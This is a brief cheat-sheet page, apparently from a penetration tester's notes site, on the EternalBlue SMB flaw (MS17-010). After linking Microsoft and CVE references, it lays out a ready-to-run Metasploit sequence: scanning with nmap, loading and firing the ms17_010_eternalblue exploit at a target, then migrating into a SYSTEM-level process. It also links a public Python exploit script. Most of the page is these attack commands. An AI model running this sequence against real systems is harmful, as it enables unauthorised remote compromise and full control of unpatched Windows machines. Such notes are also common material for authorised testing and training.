Logo
RSS Feed

Eternal Blue

Created: 28.07.2022

It’s basically a biffer overflow vulnerability in the SMB module.

References

Expand…

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

📕 RTFM

nmap --script vuln <ip>
msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue 
set RHOSTS <targets IP>
exploit
# you will get a session if the system is vulnerable

ps # list processes, choose the one with System permissions if your permissions are not enough

migrate <pid> # try different PIDs 

Python exploit script - https://github.com/3ndG4me/AutoBlue-MS17-010/blob/master/eternalblue_exploit10.py.